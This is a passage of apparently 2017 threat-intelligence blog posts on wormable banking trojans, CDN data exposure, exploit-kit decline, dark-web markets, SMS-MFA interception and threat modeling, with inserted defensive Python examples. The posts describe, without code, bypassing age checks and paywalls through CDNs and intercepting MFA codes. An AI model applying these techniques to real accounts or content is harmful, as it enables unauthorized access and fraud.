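The spreading host shows up as one source fanning out across many targets, which is exactly the shape a central log collector sees and an endpoint-only view misses; 4625 events with LogonType 3 (network) from workstation-to-workstation are rare enough on most networks that even a lower threshold is workable.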

    Red Hat Analysis

    The incorporation of a “worming” capability enables malware to propagate among machines within a local area network, and potentially between networks. This could enable a single successful delivery via a spam email, for example, to infect multiple machines.

A lack of technical knowledge is one reason adoption has been limited in the past. TrickBot is a well-developed and successful banking trojan, indicating that its operators are likely relatively well resourced; however, the newly added self-propagation modules were reportedly poorly written compared with its older modules, suggesting a realistic possibility that they are still under development.

    In order to assess the question of why banking trojan developers would adopt self-propagation techniques, we have conducted a Red Hat analysis exercise. Red Hat analysis is a structured analytic technique that prompts an analyst to change his or her point of reference from that of an analyst observing or predicting an adversary or competitor’s behavior, to someone who must make decisions within an existing operational culture. The technique works best when you are trying to predict the behavior of a specific person or adversary. The Red Hat analysis quadrant in Figure 2 shows the potential advantages, benefits, costs, and risks associated with future development of self-propagating techniques for banking trojans.

    Figure 2 – Red Hat analysis of developing self-propagation techniques for banking trojans

    The self propagation outlook

    Actors or groups that can implement these techniques without compromising operational security would likely gain more profit. Given this, it’s likely that the development of self-propagation capabilities will continue in the near future.

    While there’s still limited information on how self-propagation techniques have increased the profitability of Emotet and TrickBot, the incorporation of these capabilities in multiple malware variants showed their developers and operators perceived the techniques as profitable. If development of self-propagation techniques continues, it will likely increase the extent to which a specific variant can impact an enterprise network. However, this would largely depend on how hardened a network is against such activity.

    Shortly after the WCry ransomware worm, we wrote a blog on 5 lessons we can learn from security engineering. The advice in this blog extends beyond the WCry incident, and provides good advice for protecting against the rise of wormable malware, covering these five areas:

      1. Default deny
      2. Least privilege
      3. (Attack) surface reduction
      4. Need to know/compartmentalization
      5. Defense in depth

Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might be Affected and What You Can Do About It Wed, 06 Sep 2017 16:55:39 +0000

    Whether it was the Mirai botnet and Dyn or the “Cloudbleed” revelations, content delivery networks (CDNs) have been in the news recently. Research by Swisscom and Digital Shadows found over 100 million web pages and files exposed on CDNs, with many sensitive pdf, ppt and xls files publicly available online. The risks don’t stop here; if improperly configured, CDNs can be used to bypass age restrictions and registration requirements.

    What is a CDN?

To start off, let’s level set on what a CDN does. A CDN is a system of distributed servers that delivers webpages and other web content to a user based on the geographic location of the user, the origin of the webpage and the content delivery server. Users can therefore access content much faster, and the sites serving it are less susceptible to denial of service attacks. Given that over 52% of the Alexa top 1,000 websites use a CDN, you may not realize how often you are browsing CDN-delivered content.

    Figure 1: Diagram of a CDN. Source:

    Research Methodology

    To assess the amount of content exposed by CDNs and the subsequent risk:

    1. We first enumerated as many Content Delivery Networks as possible and identified the most deployed CDNs. In total we identified 293 CDNs, many of which can be found here
    2. Searches for these domains were completed across Google, Yandex and Bing to identify the search engine with most coverage. Google was found to have the highest yield, having the most results in over 50 percent of the CDN providers.
    3. Other searches were performed to assess the number of file types and the sensitivity of these documents.
    4. Finally, more manual analysis was applied to understand the implications of the content of these documents.

    Over 100 Million Indexed Pages Leave Organizations Exposed

In total, searches indicated that there were 103,944,919 indexed web pages and other web content across the CDN domains we assessed. Of these, nearly 15 million CDN-delivered pages carried PDFs. Many were benign, but over 22,000 were marked as sensitive and not for public distribution.

    Some of the findings were enlightening. There was no shortage of intellectual property across pdfs and ppts, with designs, financial information, plans and pricing models and even reports about nuclear generating stations (Figure 2) all readily available.

    Figure 2: Nuclear Generating Station

    This could produce a gold mine for competitive intelligence, espionage and phishing. No hacking is necessary – the content is already out there.

    The publicly available spreadsheets (xls and csv files) were worrisome as well. Examples of the types of data discovered included:

    • Sensitively marked patient health testing data
    • A mobile app development competition database with exposed visa numbers, dates of birth, gender and occupation
    • Membership details of clubs with names, home addresses, emails and telephone numbers (See Figure 3)

    Figure 3: Spreadsheet

CDNs can be used to bypass protection mechanisms

    Security mechanisms are put in place so that a website’s content is protected. However, in some instances, CDNs can be used to bypass these restrictions.

    Take YouTube’s age restrictions, for example. Navigating directly to the video itself will force users to log in and verify their age (Figure 4). By searching for the video through a CDN, users can bypass this control on age restriction.

    Figure 4: Age restriction on

    Figure 5: Bypassing YouTube’s age restriction via a CDN

Secondly, we identified ways to bypass registration requirements for paid content. One online education platform charges between $99 and $995 a year for access to a wide range of course materials; the same materials could be retrieved at no cost by requesting them directly from the platform’s CDN.

    Why it matters

It is no surprise that there is sensitive information available through search engines; there are many instances of data exposed through an organization’s supply chain. As the previous examples demonstrate, the impact of these external digital risks includes:

    • Loss of revenue
    • Reputation damage
    • Compliance issues

    Adversaries can reap the rewards of these CDN issues by directing and tailoring their searches to these domains.

    What can be done

Let us be clear: most files and pages available through CDNs are perfectly benign. However, a subset of them can leave organizations exposed. With the EU GDPR approaching, it is important that organizations understand where their data exists online. The fact that CDNs duplicate this information poses a risk in its own right, and in various cases we identified it was the CDN that was exposing the data without the organization’s consent. There are several things organizations can do to secure their data and to identify and mitigate the risks associated with the digital shadows found on CDNs:

1. Use URL signing and appropriate TTLs on the URLs that you share. URL signing protects files from unauthorized access with a key, and a short time-to-live limits how long a leaked link stays useful. Cdn777 provides good advice
2. Have a defined document marking system, whether through Digital Rights Management (DRM) or a defined template system in MS Office. This lets you more readily identify which documents should or should not be available online.
3. Ensure that your sensitive information is not being indexed by search engines. Most CDNs offer guides on how to de-index pages; Hubspot, for example, provides good advice on using the noindex and nofollow HTML meta tags.
4. Set up Google Alerts to monitor for the risks associated with CDNs. Understand that it isn’t always your own systems exposing these documents; often it is third parties.
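
Signed URLs, the first recommendation above, are straightforward to issue and verify. The block below is an added example, not from the original post and not the signing scheme of Cdn777 or any other specific CDN (each vendor has its own parameter names and layout, so use theirs in production). It assumes an HMAC key shared between the origin that issues links and the edge that serves them; the key, hostname and paths are placeholders.

```python
"""Signed, expiring URLs for content served through a CDN.

Added example (not from the original post, and not any vendor's scheme). The
origin signs path + expiry with an HMAC key shared with the CDN edge; the edge
recomputes the MAC and refuses altered or expired URLs.
"""
import hashlib
import hmac
import time
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

SECRET = b"hypothetical-shared-key-rotate-me"   # placeholder; load from a secret store in practice


def _mac(path: str, expires: int, key: bytes) -> str:
    # Bind the signature to both the path and the expiry so neither can be swapped.
    msg = f"{path}\n{expires}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def sign_url(base: str, path: str, ttl_seconds: int, key: bytes = SECRET,
             now: Optional[int] = None) -> str:
    """Origin side: issue a link for `path` that is valid for ttl_seconds from `now`."""
    expires = int(now if now is not None else time.time()) + ttl_seconds
    return f"{base}{path}?" + urlencode({"expires": expires, "sig": _mac(path, expires, key)})


def verify_url(url: str, key: bytes = SECRET, now: Optional[int] = None) -> bool:
    """Edge side: accept only if the MAC over path+expiry is correct and the expiry has
    not passed. Uses a constant-time comparison so the MAC cannot be guessed byte by byte."""
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    try:
        expires = int(q["expires"][0])
        sig = q["sig"][0]
    except (KeyError, ValueError):
        return False                                # missing or malformed parameters
    current = int(now if now is not None else time.time())
    if current >= expires:
        return False                                # expired link
    return hmac.compare_digest(sig, _mac(parsed.path, expires, key))


if __name__ == "__main__":
    link = sign_url("https://cdn.example.net", "/reports/q3-plan.pdf", ttl_seconds=300)
    print(link)
    print("valid now:", verify_url(link))
    print("tampered path:", verify_url(link.replace("q3-plan", "q4-plan")))
```

Two things matter in practice: keep the TTL short enough that a link copied into a search-indexed page or a forwarded email expires before it is useful, and rotate the key so that old leaked links cannot be re-signed by anyone who once had it.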

Bitglass: Compromised Credentials are Just One Way Your Corporate Data is Being Exposed Fri, 18 Aug 2017 19:19:25 +0000

A guest blog from Bitglass, read the original at 

    Every day, employees around the world use the cloud to perform their jobs. With bring your own device (BYOD), workers are given dynamic data access to complete their work from unmanaged devices, remote locations, and unsafe WiFi. Due to the host of modern cloud applications, corporate information can be stored in more places and shared more widely than ever. Together, these trends of BYOD, remote data access, and widespread sharing put enterprise data in jeopardy.

    In its recent study, “Datawatch,” Bitglass explored the ways in which sensitive information can be put at risk by careless employee behavior, and conducted experiments to gain insight into how easily corporate data can leak.

    Unsecured Public WiFi

    Many individuals see free public WiFi as a helpful avenue for internet access and completing work. However, such networks are typically unsecured and can allow mischievous parties to steal login credentials and other sensitive information. To uncover how easily this kind of theft can occur, Bitglass provided free public WiFi at random Bay Area locations to determine how many people would connect and what domains they would visit once online.

    Sharing and Malware

The degree to which files are shared across cloud applications can expose corporate data. Organizations can be put at risk by malicious and unauthorized users accessing sensitive information. Additionally, if even one employee is infected by malware or ransomware, he or she can spread it throughout the company merely by uploading an infected document to a shared cloud app. To test this, Bitglass analyzed how widely its customers share their data across multiple cloud applications.

    Compromised Credentials

    In light of the above scenarios, it’s apparent that one set of compromised credentials can lead to excessive data exposure. In its Compromised Credentials report, Digital Shadows, a company that gives deep analytics on digital risk, provides insight and surprising statistics on compromised credentials and the dark web.

    Geography of Leaked Credentials

    To learn more about data exposure and the results of Bitglass’ experiments, download the full report.

Fluctuation in the Exploit Kit Market – Temporary Blip or Long-Term Trend? Wed, 16 Aug 2017 16:57:43 +0000

Exploit kit activity is waning. Collectively these malware distribution tools used to be a prominent method of infection. They rely on compromised websites, malicious adverts and social engineering to direct web traffic to their landing pages and attempt the exploitation of vulnerable software. Operated by various actors and groups, exploit kits possess different features, use various exploits and distribute different malware to victims. Since June 2016 at least four of the major players in this area ceased to be active. In this blog, I wanted to explore which exploit kits are still around and propose some plausible scenarios for the future of the exploit kit landscape.

    In memoriam

    Before we look at the active kits, let’s take a moment to remember those that have gone on to greener pastures (at least for now, some kits have a habit of rising from the dead). Note I’ve only referenced the major players from the last two years in this section:

    The survivors

Despite these disappearances, the exploit kit landscape still represents a threat. Using mentions of exploit kits across social media and blogs made by security researchers, we can form an indication of how active each exploit kit actually is. In the graph below, the RIG exploit kit has been mentioned most frequently from June until the time of writing, indicating it is likely the most prominent. All of the other kits shown in the graph, with the exception of Neutrino, still had some activity associated with them, showing they were still being deployed in the wild. Nevertheless, the rate at which they were detected and reported by researchers suggested they were likely less prevalent overall.

Researcher mentions of exploit kit detections on social media and blog sites could provide reasonable insight into levels of exploit kit activity. Considering the findings, we assess it is highly likely the overall threat posed by EKs is less than it was in June of 2016, and even at the start of 2017. However, some exploit kits remain active and, depending on the number of operators using them or the scale of the campaigns, the threat still remains. Exploit kits typically rely on out-of-date browsers or browser plugins; therefore the primary mitigation for this threat is to ensure patches are applied as soon as possible. In particular, exploit kit authors favor remote code execution exploits, as our previous analysis of exploit kit payloads demonstrates.
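As an added example (not Digital Shadows' tooling), the mention-counting approach described above can be scripted: the block below tallies how many researcher posts name each kit per month, ranks the kits over a chosen period, and flags those that have gone quiet. The posts are constructed for the example, and the kit names other than RIG and Neutrino are illustrative.

```python
"""Gauge relative exploit kit activity from researcher mentions.

Added example, not Digital Shadows tooling. Counts how many researcher posts
name each exploit kit, per month and overall, to rank which kits still appear
to be deployed. Mentions are a proxy for activity, not confirmed detections:
a post saying a kit has gone quiet still counts as a mention of that kit.
"""
from __future__ import annotations

import re
from collections import Counter, defaultdict
from datetime import date

# Kits to track. RIG and Neutrino are named in the post above; the other two
# are illustrative entries for this sample.
KITS = ["RIG", "Neutrino", "Magnitude", "Sundown"]
_CANONICAL = {kit.lower(): kit for kit in KITS}
# Word-boundary, case-insensitive match so "RIG-v" and "Rig EK" both resolve to RIG.
KIT_PATTERN = re.compile(r"\b(" + "|".join(map(re.escape, KITS)) + r")\b", re.IGNORECASE)

# Constructed sample of researcher posts: (post date, source, text).
SAMPLE_MENTIONS = [
    (date(2016, 6, 2), "twitter", "Neutrino EK dropping ransomware via malvertising again"),
    (date(2016, 6, 9), "blog", "RIG EK campaign pushing a banking trojan; Neutrino still active"),
    (date(2016, 9, 20), "twitter", "Haven't seen Neutrino in weeks, RIG-v everywhere"),
    (date(2017, 1, 11), "blog", "RIG EK now the workhorse; Sundown seen occasionally"),
    (date(2017, 3, 5), "twitter", "Magnitude EK still geo-targeting, RIG pushing a loader"),
    (date(2017, 7, 18), "twitter", "Rig EK via compromised sites, Magnitude limited to a few countries"),
]


def extract_kits(text: str) -> set[str]:
    """Canonical kit names mentioned in one post (deduplicated per post)."""
    return {_CANONICAL[m.group(1).lower()] for m in KIT_PATTERN.finditer(text)}


def mentions_by_month(mentions) -> dict[tuple[int, int], Counter]:
    """Number of posts mentioning each kit, keyed by (year, month)."""
    table: dict[tuple[int, int], Counter] = defaultdict(Counter)
    for when, _source, text in mentions:
        for kit in extract_kits(text):
            table[(when.year, when.month)][kit] += 1
    return table


def rank_kits(mentions, since: tuple[int, int] | None = None) -> list[tuple[str, int]]:
    """Kits ordered by number of posts mentioning them, optionally from (year, month) on."""
    totals: Counter = Counter()
    for when, _source, text in mentions:
        if since is not None and (when.year, when.month) < since:
            continue
        for kit in extract_kits(text):
            totals[kit] += 1
    return totals.most_common()


def silent_kits(mentions, since: tuple[int, int]) -> list[str]:
    """Tracked kits with no mentions at all from (year, month) on: candidates for 'gone'."""
    seen = {kit for kit, _count in rank_kits(mentions, since)}
    return sorted(set(KITS) - seen)


if __name__ == "__main__":
    for kit, count in rank_kits(SAMPLE_MENTIONS, since=(2017, 1)):
        print(f"{kit:10s} {count} posts since Jan 2017")
    print("no mentions since Jan 2017:", silent_kits(SAMPLE_MENTIONS, (2017, 1)))
```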

    Exploit Kit Activity

    Exploit Kit Mentions DarkWeb

     A potential reason for the decline of exploit kits

    The reasons for these disappearances were unconfirmed in most cases, but at least one EK developer was reported to have claimed it was no longer profitable.

There were a number of other possible explanations for this overall decline, including law enforcement action or the relatively resource-intensive nature of exploit kit operations. Running these operations can be laborious:

    1. Software development of the exploit kit.
    2. Acquisition of remote code execution exploits for browser-related software
    3. Registration of large numbers of domains to host the exploit kits
    4. Generation of traffic to the exploit kit landing pages for exploitation. Generating this traffic requires the compromise of websites, use of malicious advertising or use of spam emails.

    Furthermore, exploit kit operators contend with advert blockers, software updates and blacklists which all degrade the rates of successful exploitation. All of these factors suggest a realistic possibility that exploit kit developers or operators no longer consider them to be profitable. At a time when spam phishing campaigns were frequently used to distribute ransomware, a demonstrably lucrative type of malware, distributing malware via exploit kits is almost certainly highly resource intensive by comparison. We’ve recently seen actors experimenting with malware propagation within internal networks, shown by the TrickBot and Emotet banking trojans, which represents another method of spreading malware to multiple devices.

    Are exploit kits dying out?

Based on the exploit kit trends we have observed over the last year, it is a realistic possibility that these tools will continue to be used less frequently as part of malware distribution in the long term. The use of large quantities of phishing emails containing document attachments with embedded scripts to download malware has been proven to be highly popular and successful in the last year. Therefore, threat actors could possibly move from exploit kits to malware distribution using this type of method. However, there are multiple scenarios to consider:

1. Given a lack of competition, one exploit kit might become the most dominant. Large amounts of business going to one kit could allow it to be developed more frequently and for its developers to acquire new exploits.
    2. Following the disappearance of large exploit kits, new kits could emerge that attempt to fill the market gap.
    3. Exploit kits could decline overall but still be used in more targeted attacks. The compromise of the Polish Financial Supervision Authority website in February of 2017 involved the use of similar tactics, techniques and procedures to exploit kits.
    4. Technology to detect and block malicious emails could improve to the point that this distribution method becomes less viable, resulting in a return to exploit kit activity which depends on end point management of software updates or other patch management solutions.

    Scenarios are useful because they provide us with indicators to look for when examining threat landscapes. While it’s not always possible to say with full confidence how the future might look, the thought exercise itself can be useful. Despite these potential scenarios, exploit kits will almost certainly continue to remain a threat in the immediate future.

    All That Twitterz Is Not Gold: Why You Need to Rely on Multiple Sources of Intelligence Wed, 09 Aug 2017 19:17:43 +0000 Twitter has become an extremely valuable tool for security researchers; experts including Kevin Beaumont and PwnAllTheThings frequently post research findings on the site and following these feeds can be an excellent source for the latest developments in the information security space. However, during major incidents affecting organizations worldwide, including the outbreaks of wCry and NotPetya, relying too heavily on Twitter can cause major problems for organizations scrambling to respond.

    Unwitting misinformation

    On May 12th, when the scale of the spread of wCry began to become apparent, researchers and businesses scrambled to ascertain how the malware was spreading as security operations analysts attempted to harden their networks against the threat. During this period, many users and some media outlets speculated that the malware might be spreading via an email vector.

    Figure 1 – Screenshot of tweet on a supposed email vector for wCry.

    Even though little specific information was available, many users assumed that email had been the vector.

    Figure 2 – Screenshot of tweet on a supposed email vector for wCry.

While this might often be a safe assumption (spam email is by far the most common vector for ransomware delivery), in this case it was an unproven one. It later emerged that a major contributor to the confusion was a spam campaign delivering the Jaff ransomware, which was highly active on the same day. While it was not confirmed until later, throughout the afternoon of May 12th multiple researchers accurately identified the true propagation vector used by wCry – SMB. Unfortunately, in some instances security advice was given on the basis of this understandable confusion, potentially leading to security operations personnel spending time hunting spam emails while a greater threat lay elsewhere.

    Figure 3 – Notification from security software-as-a-service provider MailGuard.

    Information versus intelligence

    While potentially very useful, information derived from sources such as Twitter should always be treated with caution and assessed in the context of information derived from other sources, particularly when it’s being used to inform a security team’s actions in a time sensitive situation.

This is the difference between information and intelligence; intelligence is aggregated data which has been assessed for credibility and presented in context with appropriate caveats for uncertainty and an assessment of significance. While intelligence must be timely to be useful, unassessed information which may be inaccurate can be even more damaging than the delay required to complete a full assessment.

    When the Digital Shadows analyst team investigated wCry on May 12th, we were able to identify indications that suggested spam emails were not the vector being used, leading us to pursue alternative hypotheses that the malware was spreading over SMB. While we are hugely appreciative of the work researchers do to raise awareness of security issues on Twitter and make extensive use of this source, we have found on many occasions that relying on this alone has the potential to lead to operational mistakes and misallocation of resources.

    Cybercrime Finds a Way, the Limited Impact of AlphaBay and Hansa’s Demise Mon, 07 Aug 2017 23:14:37 +0000 The law enforcement operations that took down the AlphaBay and Hansa marketplaces were meant to strike a sizable blow to the online trade of illegal goods and services. Frequenters of these services might now think twice before placing their trust in these unregulated platforms, and there may well be further arrests to follow as investigations and analysis into the materials seized in these raids run their course.

However, when a drug enforcement operation completes a major bust or arrests a large number of individuals, there is almost always another group, or new recruits, ready to fill the void. Similarly, our analysis of the broader cybercriminal ecosystem suggests that the impact of the AlphaBay and Hansa closures will be somewhat short-lived, for at least three reasons:

    1. The game of whack-a-mole continues, cybercrime will find a way

    With AlphaBay and Hansa out of the picture, sellers and users will flock to other marketplaces to continue trading as before. This has been evident already, with former AlphaBay and Hansa users advertising on established forums such as Dream Market, TradeRoute, House of Lions and Wall Street Market, which we focused on in our previous blog.

Marketplace takedowns are not a new phenomenon. When Silk Road, once the largest and most popular dark web marketplace, was disrupted by the Federal Bureau of Investigation (FBI) in 2013, this only precipitated the growth of other, alternative platforms. AlphaBay grew from Silk Road’s closure and eventually took on the mantle of the most popular dark web market. Subsequent reincarnations of Silk Road in the form of Silk Road 2.0 and Silk Road 3.0 exemplify how the cycle will likely continue for the foreseeable future. We have seen alternatives emerge as a result of marketplace exit scams as well. In 2015, administrators from the Evolution Marketplace stole an estimated 40,000 BTC. Dream Market was one of the beneficiaries of that exit scam.

    Just as Jeff Goldblum’s Jurassic Park character, Doctor Ian Malcolm says, “Life uh, finds a way,” cybercrime finds a way as well. Commerce must flow; buyers and sellers need to be connected.

    Cybercrime Finds a Way

    2. AlphaBay and Hansa were only a part of a broader cybercrime ecosystem

Yes, AlphaBay and Hansa were two of the most popular English-language dark web marketplaces. And yes, they had dedicated sections for fraud-related goods (stolen payment card information, counterfeit documents, and compromised bank accounts), as well as malware and hacking tools (the RIG and Bleeding Life exploit kits were previously advertised on AlphaBay). However, from an information security perspective, we should remember that most of the products advertised on these platforms were drugs, weapons, and digital goods such as media accounts and service subscriptions.

    Our research shows that there are other forums specifically dedicated to hacking and security, which often act as a platform for trade. Sites like CrimeNet, HPC, and Exploit[.]in contain many examples of threat actors offering products such as ransomware variants, exploit kits, compromised accounts and payment card data. These sites work on a direct transfer system where vendors and customers will communicate directly to arrange payment, often through messaging services such as Jabber. Often sellers will advertise their products on these forums, and then direct users to dark web sites to then arrange payment. Where stolen databases have appeared on sites like Hansa, we assessed it to be highly likely that these datasets were previously traded widely through other criminal networks and then listed on these marketplaces only once their value had been exhausted.

Figure 1: Advert on deep web forum HPC for FileFrozr ransomware

    Payment card fraud is a good example of why we should not focus too heavily on marketplaces. There are countless carding and Automated Vending Cart (AVC) sites dedicated to payment card fraud. These types of sites often provide tutorials and courses for novice fraudsters, as we highlight in our recent whitepaper. With new carding and AVC sites emerging every day, this type of activity will continue unabated despite the AlphaBay and Hansa takedowns.

    Figure 2: AVC site allowing users to buy stolen payment card data

    3. Not all cybercrime occurs on the dark web

    Many carding, AVC and hacking sites are not actually found on the dark web, including HPC, CrimeNet and Exploit, which we mentioned above. Moreover, certain types of cybercrime do not need the “anonymity” provided by services such as Tor, or the advertising and transactional functions fulfilled by the marketplace model. Plenty of cybercrime occurs on the open and deep web.

Extortion activity by the darkoverlord, a threat actor we have cited previously, illustrates this point. When the darkoverlord first came to our attention in June 2016, the actor relied heavily on dark web sites such as the Real Deal to advertise stolen datasets. Yet, since the closure of the Real Deal in November 2016, the darkoverlord has remained active and has made use of clear web sites such as Pastebin and Twitter to conduct extortion-based activity. In June 2017, the darkoverlord released eight episodes of an un-aired American Broadcasting Company (ABC) show, posting a message to Pastebin that included a link to the torrent website The Pirate Bay. Three days later, the darkoverlord published over 6,000 medical records that allegedly belonged to a clinic in California. The documents were uploaded to the sharing site mega[.]nz after the clinic purportedly failed to respond to the ransom demands.

    While the AlphaBay and Hansa takedowns will likely provide significant intelligence gains, there will always be supply and demand for illicit goods and services. Digital Shadows will continue monitoring the development of the cybercriminal ecosystem, particularly in these turbulent times. Marketplaces were never seen as the go-to shop for rare exploits or sensitive datasets, and we expect the more sophisticated sellers to continue using more niche forums or private communication channels to flog their wares. Moreover, with other forms of cybercrime occurring outside of the dark web, organizations and individuals would be wrong to assume that the risk of a cyber-attack has now been significantly reduced.

    Reading Your Texts For Fun and Profit – How Criminals Subvert SMS-Based MFA Tue, 01 Aug 2017 13:57:24 +0000 Why Multi Factor?

    Read almost any cyber security related news and you will start to see why using a password alone isn’t the most secure way of preventing unauthorized access to your account. Multi-factor authentication (MFA) is invaluable because it adds extra obstacles for attackers attempting to access your account, hence why it has become such a popular account security control. There are different flavors of MFA ranging from codes sent via text (SMS), authentication applications, or physical devices. Naturally attackers are going to try and circumvent MFA, so we conducted some research into the ways SMS-based MFA could be subverted, which are outlined below.

    Threats to SMS Based Solutions

    Recently we came across a service that claimed to provide customers with the ability to redirect phone calls and text messages, advertised on at least one hacking forum for over a year and hosted on the Tor network (see Figure 1). Named “Interconnector” and offering “SS7 Services”, this was probably in reference to what is known as Signaling System No. 7 (SS7), a signaling language used to ensure that the networks of telecommunication companies can interoperate. For example, SS7 allows someone in one country to send messages to someone in another country. If this Interconnector service was genuine (although many forum users claimed it was a scam), it would almost certainly be deemed as valuable for threat actors. Why? Because the ability to intercept SMS messages would circumvent MFA protection which relies on tokens sent via this channel. This might include your social media accounts and your online bank accounts. It might even be used to authenticate online transactions.

    Figure 1 – the “Interconnector” SS7 dark web service

The abuse of SS7 for this purpose isn’t a pipe dream; there are at least a few examples of it being used maliciously in the past. In May 2017, it was reported that criminals had been able to access and steal funds from compromised bank accounts by redirecting SMS messages containing one-time tokens and mobile transaction authorization numbers. There was also reporting in 2014 that a number of Ukrainian mobile subscribers’ phone calls had been redirected as a result of custom SS7 packets. The goal of the redirection was unknown at the time of writing.

Although SS7 abuse is certainly interesting, MFA tokens can also be obtained via other means. For example, the Retefe banking trojan was used alongside mobile malware to harvest SMS codes, while the Dridex banking trojan harvested these codes and its operators used them in real time. Threat actors can also redirect messages and calls to different SIM cards; Wired published a report in June in which it claimed attackers were able to socially engineer employees at a telecommunications company in order to have a target’s calls and text messages redirected – otherwise known as “SIM swapping”. Furthermore, so-called “fake” mobile towers, or International Mobile Subscriber Identity (IMSI) catchers, could also be used to intercept mobile traffic.

    All of these methods have their own limitations or requirements to be successful. All of them, for example, require an attacker to first obtain the relevant account credentials before they can consider intercepting MFA tokens. Furthermore, many of the examples we’ve highlighted in this blog require a relatively large amount of effort for the threat actors involved. Of these then, the abuse of SS7 would be most likely to be viable at scale, but the exact level of access and capability required to achieve such an attack isn’t entirely clear.

    Considering the Alternatives

    All of these methods and their use in the wild show that SMS-based two factor authentication (2FA) is not infallible and that criminals have an interest in circumventing it. In this context, it is unsurprising that NIST recommended in 2016 that “M” in MFA should not be SMS.

    Each method has its own advantages and disadvantages as well as capability requirements. However, someone with the appropriate capability and intent could successfully capture SMS-based MFA codes in order to access accounts, or conduct fraudulent transfers. There are some basic mitigation steps individuals could follow, including:

1. Not clicking on links in suspicious or unsolicited emails or text messages
2. Avoiding the download of mobile applications or games from unofficial stores
3. Operating anti-virus solutions and keeping them up to date
4. Considering the use of alternative MFA, such as authenticator applications or hard tokens

What is a Threat Model, and Why Organizations Should Care Mon, 31 Jul 2017 14:57:36 +0000 Many organizations are exquisitely aware that they are the target of a wide range of cyber-attacks, from targeted intrusions to mere vandalism. Financial services companies, defense contractors and critical infrastructure providers are routine and expected targets. However, shifts in how interconnected and dependent organizations are have led to changes in how attackers see the value of a particular target. As mentioned in our previous blog “Keep your Eyes on the Prize”, how valuable an organization is to an attacker is not necessarily aligned with how important an organization sees itself. In order to better understand the threats an organization faces, a threat model is typically developed.

    Threat Modeling Process

    Threat modeling is an iterative process that needs to be updated whenever there are substantial changes to either assets or threats. Typically the process consists of:

    1. Defining an organization’s assets – e.g., critical business processes, high-value systems, etc.
    2. Identifying which systems comprise those assets – e.g., databases, Enterprise Resource Planners (ERPs), etc.
    3. Creating a security profile for each system – e.g., which security controls are currently used to protect the identified software applications, such as, firewalls, Endpoint Detection and Response (EDR) systems, web proxies, etc. and which known vulnerabilities are present
    4. Identifying potential threats – e.g., hacktivists, cyber criminals, freelancers, nation states, etc.
    5. Prioritizing potential threats, and documenting adverse events and the actions taken in each case – e.g., working from known examples of documented attacks and internal risk concerns, attempting to foresee what the organizational impact of particular threats could be.
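The five steps above as a small worked threat-model worksheet, added here as an example rather than Digital Shadows' own method or code: it records assets, the systems behind them, each system's security profile and the candidate threats, then ranks threat/asset/system combinations. The systems, controls, vulnerabilities and scoring weights are assumptions chosen to mirror the case studies that follow.

```python
"""Worked threat-model worksheet following the five steps above.

Added example, not Digital Shadows' method or code. Step 1 and 2 are the
Asset/System records, step 3 is exposure(), step 4 is the Threat list and
step 5 is prioritize(). All systems, controls, vulnerabilities and scoring
weights are assumptions chosen for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class System:
    name: str
    controls: set[str]                                    # controls actually in place
    known_vulns: list[str] = field(default_factory=list)  # open findings, by name
    internet_exposed: bool = False


@dataclass
class Asset:
    name: str
    systems: list[System]
    business_impact: int   # 1 (low) .. 5 (critical) if lost, abused or hijacked


@dataclass
class Threat:
    name: str
    capability: int            # 1 (opportunistic) .. 5 (well resourced)
    interest: dict[str, int]   # asset name -> 1..5, how much this actor wants it


# Controls the step 3 profile expects on every system (assumed baseline).
BASELINE_CONTROLS = {"firewall", "edr", "web proxy", "patching"}


def exposure(system: System) -> int:
    """Step 3: collapse a system's security profile into one exposure score."""
    score = len(system.known_vulns)                     # each open vulnerability
    score += len(BASELINE_CONTROLS - system.controls)   # each missing baseline control
    if system.internet_exposed:                         # reachable by Internet-wide scanning
        score += 2
    return score


def prioritize(assets: list[Asset], threats: list[Threat]) -> list[tuple[int, str, str, str]]:
    """Step 5: rank (score, threat, asset, system), highest first.

    Score = business impact x actor interest x actor capability x exposure.
    Actors with no interest in an asset are skipped: who shows up is driven by
    the attacker's valuation of the target, not by the organization's own.
    """
    rows = []
    for asset in assets:
        for system in asset.systems:
            exp = exposure(system)
            for threat in threats:
                interest = threat.interest.get(asset.name, 0)
                if interest == 0:
                    continue
                score = asset.business_impact * interest * threat.capability * exp
                rows.append((score, threat.name, asset.name, system.name))
    return sorted(rows, reverse=True)


def build_sample_model() -> tuple[list[Asset], list[Threat]]:
    """Constructed model loosely mirroring the case studies in this post."""
    assets = [
        Asset("customer transaction data", business_impact=5, systems=[
            System("core-db", {"firewall", "edr", "patching"}),
        ]),
        Asset("shipped DVR product fleet", business_impact=2, systems=[
            System("dvr-firmware", set(), ["default credentials", "telnet enabled"], True),
        ]),
        Asset("software update server", business_impact=4, systems=[
            System("update-server", {"firewall", "web proxy"}, ["unsigned update packages"], True),
        ]),
    ]
    threats = [
        Threat("botnet operator", capability=2, interest={"shipped DVR product fleet": 4}),
        Threat("cyber criminal", capability=3, interest={"customer transaction data": 4}),
        Threat("nation state", capability=5,
               interest={"customer transaction data": 5, "software update server": 4}),
    ]
    return assets, threats


if __name__ == "__main__":
    # Note how the "non-critical" DVR fleet outranks the critical database
    # purely on exposure, the point the Mirai case study below makes.
    for score, threat, asset, system in prioritize(*build_sample_model()):
        print(f"{score:4d}  {threat:16s} -> {asset} ({system})")
```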

    If your organization does any of the following things, you may find the chosen case studies to be helpful in developing your own threat model:

    If you build things: if an organization builds devices which have internet connectivity, it needs a Secure Development Lifecycle (SDL).  The Mirai botnet illustrated this point by hijacking internet-connected devices which were not considered to be critical assets. The devices in question had default passwords and were connected to the public internet. Armed with a simple list of passwords, DVR appliances were readily compromised by Mirai and harnessed together to flood targets with up to 1.2Tbps of traffic.

    If you make software: widely-deployed or strategically-deployed software are both attractive targets for attackers. Backdooring carefully chosen software allows an attacker to gain access to a particular target. The Nyetna attack showed how a widely-deployed piece of software in a particular geography can become an extremely attractive target for attackers, effectively giving them access to over 400,000 endpoints with a single malicious update. The Havex malware was used in a campaign targeting Industrial Control Systems (ICS) by, among other vectors, backdooring the software installation files for three different ICS vendors. Compromises of this nature allow the attacker to have their malware deployed directly to their targets, most likely bypassing perimeter and other security controls.

